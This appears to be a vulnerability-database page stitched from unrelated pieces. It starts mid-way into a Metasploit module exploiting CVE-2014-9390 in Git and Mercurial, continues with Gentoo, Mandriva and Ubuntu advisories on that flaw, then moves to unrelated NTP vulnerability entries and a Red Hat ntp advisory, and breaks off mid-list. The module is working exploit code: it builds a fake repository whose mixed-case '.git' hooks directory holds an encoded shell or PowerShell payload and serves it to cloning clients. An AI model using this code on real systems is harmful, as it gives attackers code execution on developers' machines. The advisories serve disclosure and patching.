less than 3.2.3) and describes three vulnerabilities.
On operating systems which have case-insensitive file systems, like
Windows and OS X, Git clients can be convinced to retrieve and
overwrite sensitive configuration files in the .git
directory which can allow arbitrary code execution if a vulnerable
client can be convinced to perform certain actions (for example,
a checkout) against a malicious Git repository.
The third vulnerability with similar characteristics only affects
Mercurial clients on Windows, where Windows "short names"
(MS-DOS-compatible 8.3 format) are supported.
Today this module only truly supports the first vulnerability (Git
clients on case-insensitive file systems) but has the functionality to
support the remaining two with a little work.
),
'License' => MSF_LICENSE,
'Author' => [
'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module
],
'References' =>
[
['CVE', '2014-9390'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],
['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],
['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],
['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],
['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],
['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],
['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],
['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']
],
'DisclosureDate' => 'Dec 18 2014',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp perl bash'
}
}
}
],
[
'Windows Powershell',
{
'Platform' => [ 'windows' ],
'Arch' => [ARCH_X86, ARCH_X86_64]
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('GIT', [true, 'Exploit Git clients', true])
]
)
register_advanced_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),
OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),
OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])
]
)
end
def setup
# the exploit requires that we act enough like a real Mercurial HTTP instance,
# so we keep a mapping of all of the files and the corresponding data we'll
# send back along with a trigger file that signifies that the git/mercurial
# client has fetched the malicious content.
@repo_data = {
git: { files: {}, trigger: nil },
mercurial: { files: {}, trigger: nil }
}
unless datastore['GIT'] || datastore['MERCURIAL']
fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
end
setup_git
setup_mercurial
super
end
def setup_git
return unless datastore['GIT']
# URI must start with a /
unless git_uri && git_uri =~ /^\//
fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /')
end
# sanity check the malicious hook:
if datastore['GIT_HOOK'].blank?
fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank')
end
# In .git/hooks/ directory, specially named files are shell scripts that
# are executed when particular events occur. For example, if
# .git/hooks/post-checkout was an executable shell script, a git client
# would execute that file every time anything is checked out. There are
# various other files that can be used to achieve similar goals but related
# to committing, updating, etc.
#
# This builds a fake git repository using the knowledge from:
#
# http://schacon.github.io/gitbook/7_how_git_stores_objects.html
# http://schacon.github.io/gitbook/7_browsing_git_objects.html
case target.name
when 'Automatic'
full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
when 'Windows Powershell'
psh = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
encode_final_payload: true)
full_cmd = "#!/bin/sh\n#{psh}"
end
sha1, content = build_object('blob', full_cmd)
trigger = "/objects/#{get_path(sha1)}"
@repo_data[:git][:trigger] = trigger
@repo_data[:git][:files][trigger] = content
# build tree that points to the blob
sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the hooks directory in which the hook lives, called hooks
sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the partially uppercased .git directory in
# which hooks live
variants = []
%w(g G). each do |g|
%w(i I).each do |i|
%w(t T).each do |t|
git = g + i + t
variants << git unless git.chars.none? { |c| c == c.upcase }
end
end
end
git_dir = '.' + variants.sample
sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"
if datastore['VERBOSE']
vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
commit.each_line { |l| vprint_status(l.strip) }
end
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build HEAD
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
# lastly, build refs
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
end
def setup_mercurial
return unless datastore['MERCURIAL']
# URI must start with a /
unless mercurial_uri && mercurial_uri =~ /^\//
fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /')
end
# sanity check the malicious hook
if datastore['MERCURIAL_HOOK'].blank?
fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')
end
# we fake the Mercurial HTTP protocol such that we are compliant as possible but
# also as simple as possible so that we don't have to support all of the protocol
# complexities. Taken from:
# http://mercurial.selenic.com/wiki/HttpCommandProtocol
# http://selenic.com/hg/file/tip/mercurial/wireproto.py
@repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'
fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'
@repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n"
# TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat
@repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
# TODO: finish building the fake repository
end
# Build's a Git object
def build_object(type, content)
# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
header = "#{type} #{content.size}\0"
store = header + content
[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
end
# Returns the Git object path name that a file with the provided SHA1 will reside in
def get_path(sha1)
sha1[0...2] + '/' + sha1[2..40]
end
def exploit
super
end
def primer
# add the git and mercurial URIs as necessary
if datastore['GIT']
hardcoded_uripath(git_uri)
print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
end
if datastore['MERCURIAL']
hardcoded_uripath(mercurial_uri)
print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}")
end
end
# handles routing any request to the mock git, mercurial or simple HTML as necessary
def on_request_uri(cli, req)
# if the URI is one of our repositories and the user-agent is that of git/mercurial
# send back the appropriate data, otherwise just show the HTML version
if (user_agent = req.headers['User-Agent'])
if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
do_git(cli, req)
return
elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)
do_mercurial(cli, req)
return
end
end
do_html(cli, req)
end
# simulates a Git HTTP server
def do_git(cli, req)
# determine if the requested file is something we know how to serve from our
# fake repository and send it if so
req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
if @repo_data[:git][:files].key?(req_file)
vprint_status("Sending Git #{req_file}")
send_response(cli, @repo_data[:git][:files][req_file])
if req_file == @repo_data[:git][:trigger]
vprint_status("Trigger!")
# Do we need this? If so, how can I update the payload which is in a file which
# has already been built?
# regenerate_payload
handler(cli)
end
else
vprint_status("Git #{req_file} doesn't exist")
send_not_found(cli)
end
end
# simulates an HTTP server with simple HTML content that lists the fake
# repositories available for cloning
def do_html(cli, _req)
resp = create_response
resp.body = <<HTML
<html>
<head><title>Public Repositories</title></head>
<body>
<p>Here are our public repositories:</p>
<ul>
HTML
if datastore['GIT']
this_git_uri = URI.parse(get_uri).merge(git_uri)
resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
else
resp.body << "<li><a>Git</a> (currently offline)</li>"
end
if datastore['MERCURIAL']
this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>"
else
resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
end
resp.body << <<HTML
</ul>
</body>
</html>
HTML
cli.send_response(resp)
end
# simulates a Mercurial HTTP server
def do_mercurial(cli, req)
# determine if the requested file is something we know how to serve from our
# fake repository and send it if so
uri = URI.parse(req.uri)
req_path = uri.path
req_path += "?#{uri.query}" if uri.query
req_path.gsub!(/^#{mercurial_uri}/, '')
if @repo_data[:mercurial][:files].key?(req_path)
vprint_status("Sending Mercurial #{req_path}")
send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')
if req_path == @repo_data[:mercurial][:trigger]
vprint_status("Trigger!")
# Do we need this? If so, how can I update the payload which is in a file which
# has already been built?
# regenerate_payload
handler(cli)
end
else
vprint_status("Mercurial #{req_path} doesn't exist")
send_not_found(cli)
end
end
# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
def git_uri
return @git_uri if @git_uri
if datastore['GIT_URI'].blank?
@git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
else
@git_uri = datastore['GIT_URI']
end
end
# Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI
def mercurial_uri
return @mercurial_uri if @mercurial_uri
if datastore['MERCURIAL_URI'].blank?
@mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase
else
@mercurial_uri = datastore['MERCURIAL_URI']
end
end
end
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201612-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Mercurial: Multiple vulnerabilities
Date: December 07, 2016
Bugs: #533008, #544332, #578546, #582238
ID: 201612-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Mercurial, the worst of
which could lead to the remote execution of arbitrary code.
Background
==========
Mercurial is a distributed source control management system.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-vcs/mercurial < 3.8.4 >= 3.8.4
Description
===========
Multiple vulnerabilities have been discovered in Mercurial. Please
review the CVE identifier and bug reports referenced for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All mercurial users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-vcs/mercurial-3.8.4"
References
==========
[ 1 ] CVE-2014-9390
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390
[ 2 ] CVE-2014-9462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462
[ 3 ] CVE-2016-3068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068
[ 4 ] CVE-2016-3069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069
[ 5 ] CVE-2016-3105
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105
[ 6 ] CVE-2016-3630
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-19
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:169
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : git
Date : March 30, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Updated git packages fix security vulnerability:
It was reported that git, when used as a client on a case-insensitive
filesystem, could allow the overwrite of the .git/config file when
the client performed a git pull. Because git permitted committing
.Git/config (or any case variation), on the pull this would replace the
user's .git/config.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390
http://advisories.mageia.org/MGASA-2014-0546.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
ef3f480ca48a2a9611bd11fa8a045892 mbs2/x86_64/git-1.8.5.6-1.mbs2.x86_64.rpm
efd3deae08fd17b80008bd3dc881d1f7 mbs2/x86_64/git-arch-1.8.5.6-1.mbs2.x86_64.rpm
c60432719a43e70eb929c1c75c93fdda mbs2/x86_64/git-core-1.8.5.6-1.mbs2.x86_64.rpm
10fb62c0748447bd1b960789125e8d1b mbs2/x86_64/git-core-oldies-1.8.5.6-1.mbs2.x86_64.rpm
dafec670f61de3e9942a97377b604859 mbs2/x86_64/git-cvs-1.8.5.6-1.mbs2.x86_64.rpm
879edb749813e5e175e90c88d2188eb9 mbs2/x86_64/git-email-1.8.5.6-1.mbs2.x86_64.rpm
1261450cb657453cd10a055301e42e01 mbs2/x86_64/gitk-1.8.5.6-1.mbs2.x86_64.rpm
8b4e493293c55a955e439233ae55ec99 mbs2/x86_64/git-prompt-1.8.5.6-1.mbs2.x86_64.rpm
2a4694ce47fe835f532cd7acc734e7b3 mbs2/x86_64/git-svn-1.8.5.6-1.mbs2.x86_64.rpm
39c2ff102bf754a4ca9a6d9d70fbc79c mbs2/x86_64/gitview-1.8.5.6-1.mbs2.x86_64.rpm
35bb63e42cfe602a24ae790fe3ddbd54 mbs2/x86_64/gitweb-1.8.5.6-1.mbs2.x86_64.rpm
d464e9766d38928a7fe9510382356724 mbs2/x86_64/lib64git-devel-1.8.5.6-1.mbs2.x86_64.rpm
644c0f388c821f9192485494ac3199d5 mbs2/x86_64/perl-Git-1.8.5.6-1.mbs2.x86_64.rpm
261134d774a1b833817d8855214a9412 mbs2/SRPMS/git-1.8.5.6-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVGPUcmqjQ0CJFipgRAh4wAKDuznNiViTa2PaV8idvg0tSlPIzMACg7AqX
AknCsk/2slzIzxNpACLxeDI=
=Vdej
-----END PGP SIGNATURE-----
. Content-Disposition: inline
==========================================================================Ubuntu Security Notice USN-2470-1
January 14, 2015
git vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Git could be made to run programs as your login if it received specially
crafted changes from a remote repository.
Software Description:
- git: fast, scalable, distributed revision control system
Details:
Matt Mackall and Augie Fackler discovered that Git incorrectly handled certain
filesystem paths. The
remote attacker would need write access to a Git repository that the victim
pulls from.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
git 1:2.1.0-1ubuntu0.1
Ubuntu 14.04 LTS:
git 1:1.9.1-1ubuntu0.1
Ubuntu 12.04 LTS:
git 1:1.7.9.5-1ubuntu0.1
After a standard system update you need to set the core.protectHFS and/or
core.protectNTFS Git configuration variables to "true" if you store Git trees
in HFS+ and/or NTFS filesystems. If you host Git trees, setting the
core.protectHFS, core.protectNTFS, and receive.fsckObjects Git configuration
variables to "true" will cause your Git server to reject objects containing
malicious paths intended to overwrite the Git metadata.
References:
http://www.ubuntu.com/usn/usn-2470-1
CVE-2014-9390
Package Information:
https://launchpad.net/ubuntu/+source/git/1:2.1.0-1ubuntu0.1
https://launchpad.net/ubuntu/+source/git/1:1.9.1-1ubuntu0.1
https://launchpad.net/ubuntu/+source/git/1:1.7.9.5-1ubuntu0.1
| VAR-201510-0705 | CVE-2014-9750 | NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated) |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
ntp_crypto.c in ntpd in NTP 4.x before 4.2.8p1, when Autokey Authentication is enabled, allows remote attackers to obtain sensitive information from process memory or cause a denial of service (daemon crash) via a packet containing an extension field with an invalid value for the length of its value field. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. ( Daemon crash ) There is a possibility of being put into a state. NTP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: ntp security, bug fix, and enhancement update
Advisory ID: RHSA-2015:2231-04
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html
Issue date: 2015-11-19
CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750
CVE-2014-9751 CVE-2015-1798 CVE-2015-1799
CVE-2015-3405
=====================================================================
1. Summary:
Updated ntp packages that fix multiple security issues, several bugs, and
add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
3. Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time
with another referenced time source. These packages include the ntpd
service which continuously adjusts system time and utilities used to query
and configure the ntpd service.
It was found that because NTP's access control was based on a source IP
address, an attacker could bypass source IP restrictions and send
malicious control and configuration packets by spoofing ::1 addresses.
(CVE-2014-9298, CVE-2014-9751)
A denial of service flaw was found in the way NTP hosts that were peering
with each other authenticated themselves before updating their internal
state variables. An attacker could send packets to one peer host, which
could cascade to other peers, and stop the synchronization process among
the reached peers. (CVE-2015-1799)
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric
keys on big-endian systems. An attacker could possibly use this flaw to
guess generated MD5 keys, which could then be used to spoof an NTP client
or server. (CVE-2015-3405)
A stack-based buffer overflow was found in the way the NTP autokey protocol
was implemented. (CVE-2014-9297, CVE-2014-9750)
It was found that ntpd did not check whether a Message Authentication Code
(MAC) was present in a received packet when ntpd was configured to use
symmetric cryptographic keys. A man-in-the-middle attacker could use this
flaw to send crafted packets that would be accepted by a client or a peer
without the attacker knowing the symmetric key. (CVE-2015-1798)
The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav
Lichvár of Red Hat.
Bug fixes:
* The ntpd service truncated symmetric keys specified in the key file to 20
bytes. As a consequence, it was impossible to configure NTP authentication
to work with peers that use longer keys. With this update, the maximum key
length has been changed to 32 bytes. (BZ#1191111)
* The ntpd service could previously join multicast groups only when
starting, which caused problems if ntpd was started during system boot
before network was configured. With this update, ntpd attempts to join
multicast groups every time network configuration is changed. (BZ#1207014)
* Previously, the ntp-keygen utility used the exponent of 3 when generating
RSA keys. Consequently, generating RSA keys failed when FIPS mode was
enabled. With this update, ntp-keygen has been modified to use the exponent
of 65537, and generating keys in FIPS mode now works as expected.
(BZ#1191116)
* The ntpd service dropped incoming NTP packets if their source port was
lower than 123 (the NTP port). With this update, ntpd no longer checks the
source port number, and clients behind NAT are now able to correctly
synchronize with the server. (BZ#1171640)
Enhancements:
* This update adds support for configurable Differentiated Services Code
Points (DSCP) in NTP packets, simplifying configuration in large networks
where different NTP implementations or versions are using different DSCP
values. (BZ#1202828)
* This update adds the ability to configure separate clock stepping
thresholds for each direction (backward and forward). Use the "stepback"
and "stepfwd" options to configure each threshold. (BZ#1193154)
* Support for nanosecond resolution has been added to the Structural
Health Monitoring (SHM) reference clock. Prior to this update, when a
Precision Time Protocol (PTP) hardware clock was used as a time source to
synchronize the system clock, the accuracy of the synchronization was
limited due to the microsecond resolution of the SHM protocol. The
nanosecond extension in the SHM protocol now allows sub-microsecond
synchronization of the system clock. (BZ#1117702)
All ntp users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues and add these
enhancements.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1117702 - SHM refclock doesn't support nanosecond resolution
1122012 - SHM refclock allows only two units with owner-only access
1171640 - NTP drops requests when sourceport is below 123
1180721 - ntp: mreadvar command crash in ntpq
1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1
1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated
1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration
1191122 - ntpd -x steps clock on leap second
1193154 - permit differential fwd/back threshold for step vs. slew [PATCH]
1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto
1199435 - CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks
1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
aarch64:
ntp-4.2.6p5-22.el7.aarch64.rpm
ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm
ntpdate-4.2.6p5-22.el7.aarch64.rpm
ppc64:
ntp-4.2.6p5-22.el7.ppc64.rpm
ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm
ntpdate-4.2.6p5-22.el7.ppc64.rpm
ppc64le:
ntp-4.2.6p5-22.el7.ppc64le.rpm
ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm
ntpdate-4.2.6p5-22.el7.ppc64le.rpm
s390x:
ntp-4.2.6p5-22.el7.s390x.rpm
ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm
ntpdate-4.2.6p5-22.el7.s390x.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64:
ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm
sntp-4.2.6p5-22.el7.aarch64.rpm
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
ppc64:
ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm
sntp-4.2.6p5-22.el7.ppc64.rpm
ppc64le:
ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm
sntp-4.2.6p5-22.el7.ppc64le.rpm
s390x:
ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm
sntp-4.2.6p5-22.el7.s390x.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-9297
https://access.redhat.com/security/cve/CVE-2014-9298
https://access.redhat.com/security/cve/CVE-2014-9750
https://access.redhat.com/security/cve/CVE-2014-9751
https://access.redhat.com/security/cve/CVE-2015-1798
https://access.redhat.com/security/cve/CVE-2015-1799
https://access.redhat.com/security/cve/CVE-2015-3405
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3
1hLTu5I/PUzWOnD8rRIlZQ==
=sWdG
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted
package to cause ntpd to crash if:
* ntpd enabled remote configuration
* The attacker had the knowledge of the configuration password
* The attacker had access to a computer entrusted to perform remote
configuration
Note that remote configuration is disabled by default in NTP.
CVE-2015-5194
It was found that ntpd could crash due to an uninitialized
variable when processing malformed logconfig configuration
commands.
CVE-2015-5195
It was found that ntpd exits with a segmentation fault when a
statistics type that was not enabled during compilation (e.g.
timingstats) is referenced by the statistics or filegen
configuration command
CVE-2015-5219
It was discovered that sntp program would hang in an infinite loop
when a crafted NTP packet was received, related to the conversion
of the precision value in the packet to double.
CVE-2015-5300
It was found that ntpd did not correctly implement the -g option:
Normally, ntpd exits with a message to the system log if the offset
exceeds the panic threshold, which is 1000 s by default. This
option allows the time to be set to any value without restriction;
however, this can happen only once. If the threshold is exceeded
after that, ntpd will exit with a message to the system log. This
option can be used with the -q and -x options.
ntpd could actually step the clock multiple times by more than the
panic threshold if its clock discipline doesn't have enough time to
reach the sync state and stay there for at least one update. If a
man-in-the-middle attacker can control the NTP traffic since ntpd
was started (or maybe up to 15-30 minutes after that), they can
prevent the client from reaching the sync state and force it to step
its clock by any amount any number of times, which can be used by
attackers to expire certificates, etc.
This is contrary to what the documentation says. Normally, the
assumption is that an MITM attacker can step the clock more than the
panic threshold only once when ntpd starts and to make a larger
adjustment the attacker has to divide it into multiple smaller
steps, each taking 15 minutes, which is slow.
CVE-2015-7691, CVE-2015-7692, CVE-2015-7702
It was found that the fix for CVE-2014-9750 was incomplete: three
issues were found in the value length checks in ntp_crypto.c, where
a packet with particular autokey operations that contained malicious
data was not always being completely validated. Receipt of these
packets can cause ntpd to crash.
CVE-2015-7701
A memory leak flaw was found in ntpd's CRYPTO_ASSOC.
CVE-2015-7703
